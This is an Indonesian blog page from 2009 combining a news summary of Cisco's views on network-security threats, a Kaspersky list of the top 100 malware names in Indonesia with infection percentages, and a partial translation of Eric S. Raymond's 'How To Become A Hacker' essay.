Selasa, 11 Agustus 2009

Tiga Ancaman Terbesar Jaringan Keamanan Internet

Asal ancaman jaringan keamanan internet justru disebabkan oleh perilaku manusia, aktivitas dan teknologi itu sendiri. Demikian definisi yang disampaikan Prio Utomo, System Engineering (Technology) CISCO saat memaparkan laporan keamanan jaringan internet 2008 di Jakarta, Kamis (4/3).

"Keamanan jaringan internet memang tidak bisa dilakukan 100 persen. Apalagi dalam hal proteksi ini. Tapi yang terpenting adalah memperkecil dari tiga ancaman terbesar yakni pengguna, aktivitas dan teknologi," jelas Prio.

Ancaman dari pengguna, menurut Prio lebih pada perilaku karyawan yang ceroboh dan kurangnya pemahaman teknologi. Biasanya berakhir dengan hilangnya data. "Krisis global mendorong lebih banyak masalah keamanan yang menyangkut karyawan," terang Prio.

Sementara identifikasi dari aktivitas terkait tren bekerja jarak jauh menggunakan peranti berbasis web, perangkat mobile dan teknologi lainnya yang berpengaruh pada tingginya produktivitas.

"Kondisi ini menggambarkan bahwa sisi di luar jaringan perusahaan berkembang diikuti penambahan jumlah perangkat dan aplikasi yang bisa membuat sirkulasi aktivitas menjadi sangat rentan," jelas Prio.

Dari segi teknologi, setinggi apapun teknologi itu kemungkinan ancaman hadir dari sumber (source) yang tidak sempurna hingga bisa dimasuki virus. "Seperti halnya google yang bisa dijadikan perantara mengirim email sampah (spam)," tambah Prio.

Untuk memperkecil tiga ancaman itu, Prio memberikan beberapa rekomendasi. Pertama, perlu ada pelatihan karyawan dalam melindungi jaringan komputer.

Kedua, penentuan strategi prioritas. Mana yang menjadi tujuan perusahaan apakah meningkatkan keamanan jaringan melalui pembelian perangkat lunak atau mengeluarkan dana untuk menyewa ahli keamanan jaringan komputer.

Dan ketiga, pembuatan kebijakan. "Ada satu perusahaan melarang karyawannya menggunakan fasilitas email yahoo atau google, itu betul dan itu hak perusahaan dalam hal policy," ujar Prio

Program Jahat Paling Top di Indonesia

Jakarta - Kaspersky, perusahaan piranti lunak antivirus dan keamanan komputer, membeberkan data 100 program jahat yang sedang getol melanda komputer di Indonesia. Dikutip detikINET dari keterangan tertulis yang diterima Rabu (21/1/2009), di puncak daftar itu adalah Worm.Win32.AutoTDSS.hn yang mencapai 16,8 % dari jumlah infeksi.

Meski demikian, ada satu nama yang cukup dominan dalam daftar 100 program yang menyebalkan itu. Dia adalah Kido, sebuah program jahat tipe worm yang menyebar sejak akhir 2008. Tercatat ada 26 varian Kido dalam daftar tersebut.

Worm yang menyebar melalui jaringan lokal dan media penyimpanan semacam USB Flashdisk ini memiliki banyak varian. Program jahat ini bisa mematikan system restore, memblokir akses ke situs keamanan dan mengunduh program jahat lain ke dalam komputer yang terinfeksi.

Berikut adalah daftar 100 program jahat paling top di Indonesia yang terlacak Kaspersky pada periode 1 Januari 2009 - 19 Januari 2009. Angka dalam persen menunjukkan tingkat ditemukannya program itu:

  • Worm.Win32.AutoTDSS.hn 16.8469%
  • HEUR:Trojan.Win32.Generic 11.9442%
  • Heur.Win32.Trojan.Generic 11.3675%
  • Trojan-Proxy.Win32.Agent.mf 4.9748%
  • Net-Worm.Win32.Kido.s 4.422%
  • Net-Worm.Win32.Kido.ih 3.1963%
  • Trojan-Downloader.Win32.Small.aacq 2.5955%
  • Trojan-Dropper.Win32.Small.axv 2.5715%
  • Heur.Win32.Invader 2.5715%
  • Worm.Win32.AutoTDSS.bcw 2.4033%
  • Trojan-GameThief.Win32.Magania.gen 2.3071%
  • Trojan-Dropper.Win32.Agent.bvn 2.2591%
  • Net-Worm.Win32.Kido.t 2.0908%
  • Trojan-Downloader.Win32.Agent.wxq 1.2497%
  • Trojan.Win32.Agent2.w.a 1.1776%
  • Worm.Win32.Downloader.yw 1.0815%
  • Trojan.Win32.Qhost.kmq 1.0094%
  • Trojan-Dropper.Win32.Agent.zje 0.8892%
  • Trojan-Dropper.Win32.Small.cdw 0.6729%
  • Trojan.Win32.Agent.bhug 0.6489%
  • Trojan.Win32.Agent.bdzl 0.6008%
  • HEUR:Trojan-Downloader.Win32.Generic 0.6008%
  • HEUR:Trojan.Win32.Invader 0.5768%
  • Heur.Win32.Downloader 0.5047%
  • Trojan.Win32.Agent.bfnz 0.5047%
  • Trojan-Downloader.Win32.Agent.arqp 0.4807%
  • Trojan.Win32.Obfuscated.gen 0.4326%
  • Trojan-Downloader.Win32.Small.izw 0.4086%
  • Net-Worm.Win32.Kido.bt 0.4086%
  • Trojan.Win32.Monder.gen 0.3845%
  • Net-Worm.Win32.Kido.eo 0.3845%
  • Trojan-Downloader.Win32.CodecPack.dbn 0.3845%
  • Multi.Win32.Packed 0.3605%
  • bukan virus:FraudTool.Win32.Antivirus2009.eg 0.3365%
  • Trojan-Downloader.Win32.Agent.bbvy 0.3365%
  • Net-Worm.Win32.Kido.ed 0.3124%
  • Trojan-Downloader.Win32.Small.ailx 0.3124%
  • Packed.Win32.PolyCrypt.d 0.2884%
  • Trojan-Spy.Win32.FtpSend.b 0.2884%
  • Net-Worm.Win32.Koobface.dn 0.2884%
  • Trojan-Downloader.Win32.Agent.bcmd 0.2403%
  • Net-Worm.Win32.Kido.da 0.2403%
  • bukan virus:AdWare.Win32.180Solutions.bj 0.2403%
  • Net-Worm.Win32.Kido.bg 0.2163%
  • Worm.Win32.Downloader.yv 0.2163%
  • Trojan-Spy.Win32.VB.bee 0.2163%
  • Net-Worm.Win32.Kido.c 0.2163%
  • Net-Worm.Win32.Kido.cu 0.2163%
  • Net-Worm.Win32.Kido.bx 0.1923%
  • Net-Worm.Win32.Kido.bw 0.1923%
  • Virus.Win32.VB.ki 0.1923%
  • Suspicious.Win32.Packer 0.1923%
  • Trojan.Win32.FraudPack.aie 0.1923%
  • Trojan-Downloader.Win32.FraudLoad.cxs 0.1923%
  • Trojan-Mailfinder.Win32.Delf.cr 0.1923%
  • Trojan.Win32.Agent.bcan 0.1682%
  • Net-Worm.Win32.Kido.gx 0.1682%
  • Net-Worm.Win32.Kido.dw 0.1682%
  • bukan virus:Porn-Dialer.Win32.InstantAccess.e0.1682%
  • bukan virus:AdWare.Win32.Thingies 0.1682%
  • Net-Worm.Win32.Kido.fa 0.1682%
  • Trojan-Downloader.Win32.FraudLoad.vgjq 0.1682%
  • Trojan-Spy.Win32.VB.bev 0.1442%
  • Trojan.Win32.Agentb.ah 0.1442%
  • Backdoor.Win32.VB.hfq 0.1442%
  • Trojan-Downloader.Win32.FraudLoad.cxo 0.1442%
  • bukan virus:AdWare.Win32.OneStep.z 0.1442%
  • Virus.Win32.Alman.b 0.1442%
  • Virus.Win32.Sality.aa 0.1442%
  • Net-Worm.Win32.Kido.cq 0.1202%
  • Backdoor.Win32.VB.hdt 0.1202%
  • bukan virus:AdWare.Win32.Relevant.n 0.1202%
  • Trojan-Downloader.Win32.Tiny.byt 0.1202%
  • Net-Worm.Win32.Kido.dt 0.1202%
  • Net-Worm.Win32.Kido.bi 0.1202%
  • Trojan-PSW.Win32.IMMultiPass.od 0.1202%
  • bukan virus:AdWare.Win32.Shopper.v 0.1202%
  • Trojan-Dropper.Win32.Delf.clr 0.1202%
  • Net-Worm.Win32.Koobface.dw 0.1202%
  • Trojan-Downloader.Win32.CodecPack.deo 0.0961%
  • Trojan-Mailfinder.Win32.Delf.cq 0.0961%
  • Trojan-Spy.Win32.VB.beq 0.0961%
  • bukan virus:AdWare.Win32.Relevant.a 0.0961%
  • Net-Worm.Win32.Kido.ci 0.0961%
  • Backdoor.Win32.VB.hfr 0.0961%
  • Net-Worm.Win32.Kido.fc 0.0961%
  • Trojan-Downloader.Win32.BHO.ape 0.0961%
  • Net-Worm.Win32.Kido.hs 0.0961%
  • Net-Worm.Win32.Kido.ce 0.0961%
  • Net-Worm.Win32.Kido.bm 0.0961%
  • Hoax.Win32.Renos.vber 0.0961%
  • Trojan-Downloader.Win32.Agent.bakk 0.0961%
  • Trojan.Win32.Inject.mvu 0.0961%
  • Trojan.Win32.Agent.aoxh 0.0961%
  • Net-Worm.Win32.Kido.i 0.0961%
  • Trojan-Dropper.Win32.Small.ayg 0.0961%
  • Trojan-Downloader.Win32.Agent.ahyl 0.0961%
  • Net-Worm.Win32.Kido.fl 0.0961%
  • Trojan.Win32.Inject.nlj 0.0961%
  • Net-Worm.Win32.Kido.fm 0.0961%

Mau Jadi Hacker??? Baca Dulu Nih...

Terjemahan dari How To Become A Hacker


Yang mu jadi hacker, atau yang mau tau kerjaannya hacker silahkan baca terjemahan dari buku How To Become A Hakcer yang dikarang oleh mas Eric Steven Raymond yang diterjemahkan kebahasa indonesia oleh mas Steven Haryanto...

Kalo ga' baca sampe abis dijamin rugi lho...artikel ini bisa merubah pola pikir anda tentang apa sebenarnya Hacker itu.

1. Mengapa Tulisan Ini Dibuat?
Sebagai penyunting Jargon File dan penulis beberapa tulisan serupa lain yang telah dikenal luas, saya sering menerima email permintaan dari newbie jaringan yang antusias, bunyinya (kurang lebih) "bagaimana cara menjadi hacker jagoan?". Anehnya, tidak ada FAQ atau dokumen web lain yang membahas pertanyaan penting ini, jadi inilah tulisan saya.

Jika Anda membaca snapshot dokumen ini secara offline, kunjungi versi terakhirnya di http://www.tuxedo.org/~esr/faqs/hacker-howto.html.

Catatan: ada daftar FAQ di akhir tulisan. Bacalah FAQ ini -- dua kali -- sebelum mengirim email pertanyaan pada saya seputar dokumen ini.

Terjemahan berbagai bahasa dari tulisan ini tersedia: : Bulgaria, Cina (Simplified), Cina (Tradisional), Denmark, Belanda, Prancis, Finlandia, Jerman, Hungaria, Italia, Indonesia, Jepang, Korea, Portugis, Rusia, Spanyol, dan Swedia. Perhatikan bahwa karena dokumen ini sesekali berubah, terjemahan-terjemahan tersebut mungkin sedikit banyak kadaluarsa.

2. Apa Hacker Itu?
Jargon File memuat beberapa definisi untuk kata 'hacker', hampir semuanya berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Namun jika ingin menjadi seorang hacker, hanya ada dua definisi yang relevan.

Ada sebuah komunitas, budaya, terdiri dari para programer mahir dan ahli jaringan, yang sejarahnya bermula dari dekade minikomputer pertama yang memiliki time-sharing dan zaman eksperimen awal ARPAnet. Dari anggota budaya inilah muncul istilah 'hacker'. Hackerlah yang membangun internet. Hackerlah yang membuat sistem operasi Unix menjadi seperti sekarang. Hackerlah yang mengoperasikan Usenet. Hacker yang membuat World Wide Web berjalan. Jika Anda bagian dari budaya ini, jika Anda telah menyumbangkan sesuatu untuk budaya ini, dan rekan lain di dalamnya mengenali Anda sebagai seorang hacker, maka seorang hackerlah Anda.

Cara pikir hacker tidak terbatas pada budaya hacker software. Ada orang yang menerapkan sikap hacker pada banyak bidang lain, elektronik atau musik -- bahkan, cara pikir hacker ada di tingkat tertinggi setiap bidang ilmu dan seni. Hacker software mengakui semangat serupa ini dan kadang menyebut orang-orang tersebut "hacker" pula -- sebagian juga berpendapat bahwa sifat seorang hacker tidak bergantung pada wadah tempatnya bekerja. Tapi, untuk selanjutnya, kita akan memusatkan perhatian pada software hacker, keahlian dan sikap mereka, serta tradisi budaya bersama yang melahirkan istilah ?hacker?.

Terdapat pula sekelompok lain yang menyebut-nyebut diri hacker, padahal bukan. Mereka-mereka ini (terutama terdiri dari remaja pria) mendapat kepuasan lewat membobol komputer dan mengakali telepon (phreaking). Hacker sejati menyebut orang-orang ini 'cracker' dan tidak suka bergaul dengan mereka. Hacker sejati memandang cracker sebagai orang malas, tidak bertanggung jawab, dan tidak terlalu cerdas. Hacker sejati tidak setuju jika dikatakan bahwa dengan menerobos keamanan seseorang telah menjadi hacker, sama seperti jika dikatakan bahwa mengontakkan mobil membuat seseorang langsung menjadi ahli mesin. Sayangnya, wartawan dan penulis telah salah kaprah dan menggunakan kata 'hacker' untuk melukiskan cracker; sesuatu yang selalu membuat kesal para hacker sejati.

Perbedaan mendasar antara hacker dan cracker adalah hacker membangun dan cracker membongkar (yang ini perlu diingat ya...)

Jika Anda ingin menjadi hacker, lanjutkan membaca. Jika ingin menjadi cracker, kunjungi newsgroup alt.2600 dan bersiaplah menghabiskan lima sampai sepuluh tahun di balik jeruji setelah mengetahui bahwa Anda ternyata tidak sepandai yang Anda kira. Hanya itu yang perlu dikatakan tentang cracker.

3. Sikap Hacker
Pekerjaan hacker menyelesaikan masalah dan membangun sesuatu, dan hacker percaya pada kebebasan dan kerjasama sukarela. Agar dapat diterima sebagai seorang hacker, Anda harus berbuat seolah-olah Anda memiliki sikap ini. Dan agar dapat berbuat demikian, sikap ini harus benar-benar diyakini.

Tapi kalau Anda berniat menumbuhkan sikap ini hanya agar dapat diterima di lingkungan hacker, maka Anda belum menangkap maknanya. Menjadi orang yang meyakini sikap hacker penting bagi Anda sendiri -- agar bisa terus belajar dan termotivasi. Sama seperti semua seni kreatif lain, cara paling efektif untuk menjadi seorang ahli adalah dengan meniru cara berpikir ahli-ahli lainnya -- bukan hanya secara intelektual tapi juga emosional.

Seperti diungkapkan oleh sebuah sajak Zen modern di bawah:

Untuk mengikuti jalan:
pandanglah sang ahli,
ikuti sang ahli,
berjalan bersama sang ahli,
kenali sang ahili,
jadilah sang ahli.

Jadi, jika ingin menjadi hacker, ulangi pernyataan di bawah ini sampai benar-benar Anda yakini:

3.1 Dunia penuh dengan persoalan-persoalan menarik yang menanti untuk dipecahkan.
Menjadi seorang hacker sebetulnya menyenangkan, tapi 'menyenangkan' yang menuntut usaha. Usaha ini membutuhkan motivasi. Atlet yang sukses memperoleh motivasi dari kepuasan fisik saat tubuh mereka beraksi, saat mendorong diri melampaui batasan fisik. Demikian juga, untuk menjadi seorang hacker Anda harus merasa tertarik memecahkan persoalan, mengasah keahlian, dan melatih kecerdasan.

Jika Anda merasa bukan seperti ini secara naluri, Anda harus berusaha menjadi demikian jika ingin berhasil menjadi hacker. Jika tidak, energi hacking Anda akan melemah karena perhatian teralihkan oleh seks, uang, dan kedudukan.

(Anda pun harus mengembangkan keyakinan pada kapasitas belajar diri -- keyakinan bahwa meskipun yang Anda ketahui belum cukup untuk memecahkan suatu persoalan, jika satu potongan saja dari persoalan Anda usaha pecahkan, maka itu sudah cukup memberi pelajaran kepada Anda untuk menyelesaikan potongan berikutnya -- dan berikutnya, hingga semua potongan terselesaikan.)

3.2 Tidak seharusnya masalah yang sama dipecahkan dua kali.
Otak yang kreatif merupakan sumber daya yang berharga dan terbatas. Tidak seharusnya sumber daya ini diboroskan hanya untuk memikirkan kembali suatu persoalan dari dasar; padahal ada begitu banyak masalah menarik baru lain di dunia ini yang menanti.

Agar dapat bertingkah laku seperti hacker, Anda harus percaya bahwa waktu berpikir hacker lain itu berharga -- sebegitu berharganya hingga merupakan suatu kewajiban moral bagi Anda untuk membagikan informasi, menyelesaikan masalah lalu memberi jawabannya pada hacker lain supaya mereka menyelesaikan masalah baru dan tidak selamanya berkutat pada masalah-masalah lama.

(Tidak harus berkeyakinan bahwa semua produk kreatif Anda harus direlakan bagi orang lain, meski hacker yang demikianlah yang paling dihormati hacker lain. Menurut nilai-nilai hacker, jual saja sebagian asal cukup untuk tetap makan, tetap dapat membayar sewa rumah, dan tetap dapat memakai komputer. Tidak melanggar nilai hacker jika Anda memanfaatkan ilmu Anda untuk membiayai keluarga atau bahkan memperkaya diri, asalkan sambil melakukannya tetap setia pada disiplin ilmu dan sesama hacker lain.)

3.3 Kebosanan dan pekerjaan membosankan itu jahat.
Hacker (dan manusia kreatif pada umumnya) tidak seharusnya dibosankan dengan pekerjaan bodoh yang berulang-ulang, karena ini berarti mereka tidak melakukan pekerjaan yang hanya bisa dilakukan oleh mereka -- menyelesaikan persoalan-persoalan baru. Pemborosan sumber daya ini merugikan semua pihak. Karena itu kebosanan dan pekerjaan membosankan bukan saja tidak menyenangkan tapi juga jahat.

Agar dapat bertingkah laku seperti hacker, Anda harus meyakini hal ini sehingga Anda berkeinginan untuk mengotomasi sebanyak mungkin bagian yang membosankan, bukan saja bagi diri sendiri tapi juga orang lain (terutama sesama hacker).

(Ada satu kekecualian yang jelas. Hacker kadang melakukan pekerjaan yang di mata orang lain tampaknya berulang-ulang atau membosankan; ini untuk latihan menjernihkan pikiran, atau dalam rangka memperoleh keahlian atau pengalaman yang tak bisa tidak harus diperoleh dengan cara demikian. Tentu saja hal ini dilakukan atas dasar kehendaknya sendiri -- setiap orang yang mampu berpikir tidak seharusnya dipaksa menjadi bosan.)

3.4 Kebebasan itu baik.
Secara alamiah hacker itu anti-otoriter. Siapa pun yang dapat memerintah Anda akan dapat menghentikan Anda untuk menyelesaikan persoalan yang menarik -- dan, sesuai pikiran otak para otoriter, pada umumnya akan membuat alasan yang benar-benar bodoh untuk itu. Jadi sikap otoriter harus dilawan di mana pun Anda berada, agar nantinya tidak menekan Anda dan hacker-hacker lain.

(Tidak untuk disamakan dengan melawan setiap bentuk kekuasaan. Anak-anak tetap harus dibimbing, para kriminal ditahan. Seorang hacker mungkin akan tunduk pada bentuk-bentuk kekuasaan tertentu agar dapat memperoleh sesuatu yang lebih dari waktu yang dibutuhkan untuk mengikuti peraturan. Ini lebih merupakan tawar-menawar yang terbatas dan dilakukan secara sadar; jenis tunduk diri yang diinginkan oleh orang-orang otoriter tentu saja tidak bisa diterima.)

Para otoriter hidup di atas sensor dan kerahasiaan. Mereka tidak percaya pada kerjasama dan berbagi informasi -- satu-satunya jenis 'kerja sama' yang disukai adalah yang dapat mereka kendalikan. Jadi untuk berlaku seperti seorang hacker, Anda perlu mengembangkan rasa benci pada penyensoran, kerahasiaan, dan penggunaan kekerasan atau penipuan untuk memaksakan kehendak pada orang dewasa. Dan Anda harus bersedia bertindak atas dasar keyakinan ini.

3.5 Sikap saja tak ada artinya tanpa keahlian.
Untuk menjadi hacker, Anda perlu mengembangkan sebagian dari sikap-sikap yang telah disebutkan. Tapi memiliki sikap saja belum membuat seseorang menjadi hacker, atau atlet juara atau bintang rock. Untuk menjadi hacker dibutuhkan kecerdasan, latihan, dedikasi, dan kerja keras.

Jadi, Anda perlu belajar untuk tidak mempercayai sikap saja dan menghormati setiap bentuk kemampuan. Hacker tidak bersedia menghabiskan waktu dengan orang-orang yang hanya bersikap seperti hacker, tapi hacker memuja keahlian -- terutama keahlian dalam hacking, tapi juga keahlian di bidang apapun. Yang terlebih bagus lagi yaitu keahlian dalam bidang yang sulit dan hanya dapat dikuasai oleh sedikit orang, dan yang terbaik adalah keahlian dalam bidang yang sulit dan melibatkan ketajaman mental, keahlian, serta konsentrasi.

Bila Anda memuja keahlian, Anda akan merasa senang dalam meningkatkan kemampuan diri -- kerja keras dan dedikasi akan menjadi semacam permainan yang mengasyikkan ketimbang pekerjaan membosankan. Dan hal ini penting dalam proses menjadi hacker.

4. Kemampuan Hacking Dasar
Sikap hacker penting, tapi terlebih penting lagi keahlian. Sikap bukan pengganti keahlian, dan ada seperangkat keahlian menggunakan perangkat tool yang perlu Anda kuasai sebelum orang bahkan bisa berpikir memanggil Anda hacker.

Perangkat tool ini perlahan-lahan memang berubah seiring teknologi yang menciptakan keahlian baru dan membuat keahlian lama tidak berguna. Misalnya, dulu keahlian pemrograman bahasa mesin termasuk, dan kemampuan HTML belum dan hanya baru-baru ini saja. Yang jelas saat ini yang termasuk adalah:

4.1 Pelajari pemrograman.
Ini tentunya merupakan keahlian hacking yang fundamental. Jika Anda belum pernah belajar bahasa pemrograman mana pun, saya sarankan mulai dengan Python. Disainnya bersih, terdokumentasi dengan baik, dan cukup mudah bagi pemula. Meski menjadi bahasa pertama, bukan berarti Python hanya mainan; Python amat ampuh dan fleksibel dan cocok untuk proyek-proyek besar. Saya menulis evaluasi terhadap Python yang lebih mendetil. Tutorial Python bisa dilihat di situs web Python (terjemahan Indonesia).

Java juga bahasa yang baik untuk belajar pemrograman. Lebih sulit dari Python, tapi menghasilkan kode yang lebih cepat dari Python. Menurut saya Java amat bagus sebagai bahasa kedua.

Perlu diingat bahwa dengan satu dua bahasa pemrograman saja Anda tidak akan mencapai tingkat keahlian seorang hacker, atau bahkan seorang programer -- Anda perlu belajar cara memandang pemrograman secara umum, tidak bergantung pada satu bahasa mana pun. Untuk menjadi hacker sejati, Anda perlu mencapai tahap di mana Anda dapat mempelajari bahasa baru dalam beberapa hari, dengan menghubungkan apa yang ada di manual dengan apa yang telah Anda ketahui. Hal ini berarti, Anda perlu mempelajari beberapa bahasa yang jauh berbeda satu dengan yang lainnya.

Jika ingin serius dalam pemrograman, pada akhirnya Anda harus belajar C, bahasa inti sistem operasi Unix. C++ terkait erat dengan C; jika tahu yang satu, belajar yang lain tidak akan susah. Namun keduanya bukan bahasa yang cocok untuk dipelajari pertama kali.

Bahasa lain yang juga penting untuk hacker antara lain Perl dan LISP. Perl patut dipelajari untuk kebutuhan praktis; Perl dipakai secara amat meluas untuk halaman web aktif dan untuk administrasi sistem, jadi meskipun nantinya Anda tidak akan membuat program dalam Perl, Anda sebaiknya belajar cara membaca Perl. LISP patut dipelajari karena akan memberikan pengalaman 'membuka pikiran' jika Anda telah menangkapnya; dengan mempelajari LISP, Anda akan menjadi seorang programer yang lebih baik, meskipun dalam kenyataan Anda akan jarang memakainya.

Paling baik sebetulnya mempelajari semuanya (Python, Java, C/C++, Perl, dan LISP). Selain merupakan bahasa-bahasa terpenting dalam hacking, masing-masing mewakili cara pendekatan pemrograman yang berbeda, dan tiap bahasa akan memberi Anda pelajaran-pelajaran berharga.

Tentu saja, di sini tidak mungkin saya memberi petunjuk lengkap cara memrogram -- pemrograman merupakan keahlian yang kompleks. Tapi, satu petunjuk yang saya berikan: buku dan kursus saja tidak akan membuat Anda menjadi seorang programer (banyak, mungkin hampir semua hacker terbaik itu belajar mandiri). Anda akan menjadi programer dengan (a) membaca kode dan (b) menulis kode.

Belajar membuat program adalah seperti belajar menulis dalam bahasa alamiah. Cara terbaik untuk melakukannya dengan membaca tulisan yang dibuat oleh para ahlinya, membuat tulisan sendiri sedikit, membaca lebih banyak lagi, menulis lebih banyak, dan mengulanginya sampai di tulisan Anda mulai terbentuk semacam kekuatan dan kemahiran penggunaan kata seperti di tulisan-tulisan yang semula Anda teladani.

Dahulu sulit mencari kode yang baik untuk dibaca, karena dulu hanya sedikit program-program besar yang terdapat dalam bentuk source untuk bisa dibaca dan diutak-atik hacker-hacker pemula. Sekarang kondisinya jauh berbeda: software open-source, tool pemrograman, dan sistem operasi (semua dibuat oleh hacker) kini banyak terdapat. Dan ini mengantar kita pada poin berikutnya?

4.2 Cari, pelajari, dan jalankan salah satu versi Unix open-source.
Saya anggap Anda memiliki, atau memperoleh akses ke komputer pribadi (anak-anak sekarang mudah sekali mendapatkan akses :-)). Kalau ada satu langkah terpenting bagi pemula untuk mendapatkan kemampuan hacker, itu adalah mendapatkan satu salinan sistem operasi Linux atau salah satu Unix BSD, meng-install-nya di komputer sendiri, dan menjalankannya.

(Tidak saya sarankan meng-install Linux sendirian jika Anda pemula. Cari klub komputer atau kelompok pengguna Linux di daerah Anda dan mintalah bantuan; atau hubungi Linux Internet Support Co-Operative. LISC mengurus channel-channel IRC tempat Anda dapat bertanya). Tentu, di dunia ini ada banyak sistem operasi selain Unix. Tapi sistem-sistem operasi tersebut didistribusikan dalam program jadi (binary) -- kodenya tidak bisa Anda baca, sehingga sistem operasi tersebut tidak bisa Anda modifikasi. Belajar hacking di DOS atau Windows atau MacOS adalah bagaikan belajar menari dengan seluruh tubuh digips.

Lagipula Unix-lah sistem operasi Internet. Meski tentu bisa belajar menggunakan internet tanpa mengenal Unix, Anda tak akan mampu menjadi hacker Internet tanpa memahami Unix. Untuk alasan inilah, budaya hacker saat ini cukup cenderung berat ke Unix. (Ini tidak selalu benar, beberapa hacker zaman dahulu tidak menyukai kenyataan ini, tapi simbiosis antara Unix dan Internet telah menjadi kuat sehingga bahkan otot Microsoft pun tak mampu membengkokkannya.)

Jadi, buatlah sistem Unix -- saya pribadi menyukai Linux tapi tentu saja ada yang lainnya (dan ya, Anda bisa menjalankan Linux dan DOS/Windows di mesin yang sama). Pelajari Unix. Jalankan Unix. Bermain-mainlah dengan Unix. Berhubungan dengan internet melalui Unix. Baca kodenya. Modifikasi. Di Unix Anda akan menjumpai tool pemrograman yang lebih baik (termasuk C, Lisp, Python, dan Perl) ketimbang di sistem operasi Microsoft manapun, Anda akan bersenang-senang, dan Anda akan mendapat pengetahuan lebih dari yang Anda sadari sampai kemudian ketika mengenang kembali Anda telah seorang hacker ahli.

Lebih jauh tentang mempelajari Unix, lihat The Loginataka.

Untuk memperoleh Linux, lihat Where can I get Linux.

Bantuan dan resource BSD Unix bisa Anda lihat di www.bsd.org.

Saya menulis pengantar dasar Unix dan Internet.

(Catatan: Saya tidak menganjurkan menginstal Linux atau BSD sendirian jika Anda seorang pemula. Untuk Linux, carilah sebuah kelompok pengguna lokal Linux [KPLI di Indonesia] dan mintalah bantuan mereka; atau hubungi Open Projects Network. LISC memaintain daftar IRC channel yang bisa Anda datangi untuk memperoleh bantuan.)

4.3 Pelajari cara menggunakan World Wide Web dan cara menulis HTML.
Kebanyakan hasil budaya hacker bekerja di belakang layar tanpa diketahui orang banyak, membantu mengoperasikan pabrik, kantor, dan universitas, tanpa ada pengaruh yang jelas pada cara hidup para non-hacker. Web adalah satu kekecualian, bahkan para politisi pun mengakui bahwa barang mainan hacker yang besar dan berkilauan ini telah mengubah dunia. Untuk satu alasan ini saja (dan juga banyak alasan bagus lainnya) Anda perlu mempelajari cara pengoperasian Web.

Maksudnya lebih dari sekedar cara menggunakan browser (sebab kalau itu siapa pun bisa), tapi mempelajari cara menulis HTML, bahasa markup Web. Bila Anda belum menguasai pemrograman, lewat menulis HTML Anda akan diajari beberapa kebiasaan mental yang akan membantu Anda belajar pemrograman. Jadi, buatlah home page.

Hanya dengan membuat homepage tidak akan membuat Anda menjadi (bahkan dekat pun tidak) seorang hacker. Web penuh dengan home page. Kebanyakan hanyalah kotoran tanpa arti, tanpa isi -- kotoran yang tampak indah, tapi tetap kotoran (lebih jauh tentang ini, lihat The HTML Hell Page).

Agar bermanfaat, halaman Anda harus mengandung content -- harus menarik dan/atau berguna bagi hacker lain. Dan ini mengantar kita pada bahasan berikutnya...

5. Status dalam Budaya Hacker
Seperti halnya dalam kebanyakan budaya lain tanpa ekonomi uang, dunia hacker berjalan di atas reputasi. Anda berusaha menyelesaikan persoalan-persoalan menarik, tapi seberapa menarik persoalan tersebut, dan apakah solusi Anda benar-benar baik, merupakan sesuatu yang umumnya hanya dapat dinilai oleh rekan sejawat atau atasan Anda.

Demikian juga, dalam permainan hacker, Anda menjaga nilai terutama lewat pandangan hacker lain terhadap kemampuan Anda (inilah sebabnya Anda belum benar-benar seorang hacker sampai hacker-hacker lain dengan konsisten menyebut Anda seorang hacker). Kenyataan ini dikaburkan oleh citra hacking sebagai pekerjaan menyendiri; juga oleh tabu budaya hacker (yang kini perlahan-lahan menghilang namun masih tetap kuat) yang tidak mengakui bahwa ego atau pengesahan dari luar berpengaruh pada motivasi seseorang.

Tegasnya, dunia hacker merupakan apa yang disebut oleh para antropolog sebagai budaya memberi. Kedudukan dan reputasi tidak diperoleh dengan menguasai orang lain, atau dengan menjadi seseorang yang cantik, atau dengan memiliki sesuatu yang tidak dimiliki orang lain, tapi dengan memberikan sesuatu. Tepatnya, dengan memberikan waktu Anda, kreativitas, dan hasil dari kemampuan Anda.

Pada dasarnya ada lima hal yang bisa dilakukan agar dihormati oleh hacker:

5.1 Menulis software open-source.
Yang pertama (yang paling inti dan paling tradisional) adalah menulis program yang dipandang berguna atau mengasyikkan oleh hacker lain, kemudian memberikan source programnya untuk digunakan oleh seluruh budaya hacker.

(Dulu karya semacam ini disebut 'software bebas' (free software), tapi istilah ini memusingkan banyak orang karena mereka tidak tahu apa arti tepat dari 'free'. Sekarang banyak yang lebih menyukai istilah 'software open-source'.)

Para dewa1 yang dipuja di dunia hacker yaitu mereka yang telah menulis program besar yang berkemampuan tinggi dan dibutuhkan di mana-mana, lalu memberikan program ini cuma-cuma, dan sekarang program itu telah dipakai setiap orang.

5.2 Membantu menguji dan men-debug software open-source
Yang selanjutnya berjasa adalah mereka yang bertahan menggunakan dan men-debug software open-source. Di dunia yang tak sempurna ini, tanpa terhindarkan kita harus menghabiskan sebagian besar waktu pengembangan software dalam tahap debugging. Karena itu setiap penulis software open-source yang waras akan berpendapat bahwa penguji beta yang baik (yang tahu bagaimana menjelaskan gejala masalah dengan jelas, bagaimana melokalisir masalah, mampu mentolerir bug di rilis cepat, dan bersedia menjalankan beberapa rutin diagnostik sederhana) itu amat sangat berharga. Bahkan satu saja penguji beta sudah mampu membantu menjadikan tahap debugging dari mimpi buruk panjang yang melelahkan menjadi hanya gangguan yang justru menyehatkan.

Bila Anda seorang pemula, cobalah mencari program yang sedang dalam tahap pengembangan, yang menarik bagi Anda, dan jadilah seorang penguji beta yang baik. Dari sini Anda secara alamiah akan meningkat dari membantu menguji program ke membantu memodifikasi program. Anda akan belajar banyak, dan pada gilirannya nanti Anda pun akan memperoleh bantuan dari orang lain saat membutuhkan.

5.3 Menerbitkan informasi yang bermanfaat.
Yang bagus juga untuk dilakukan yaitu mengumpulkan dan menyaring informasi-informasi menarik dan berguna ke dalam halaman Web atau dokumen seperti FAQ (Frequently Asked Questions -- daftar jawaban pertanyaan-pertanyaan yang sering diajukan orang), dan membuat dokumen-dokumen ini mudah didapat orang.

Pemelihara FAQ teknis yang besar-besar juga mendapatkan hormat hampir seperti para penulis software open-source.

5.4 Membantu terus berjalannya infrastruktur.
Budaya hacker (dan juga dalam hal ini pengembangan rekayasa Internet) dijalankan oleh relawan. Banyak sekali pekerjaan yang dibutuhkan namun bukan pekerjaan yang agung, yang harus dilakukan agar semuanya tetap berjalan ? melakukan administrasi mailing list, moderasi newsgroup, memelihara situs archive software yang besar, mengembangkan dokumen-dokumen RFC serta standar teknis lainnya.

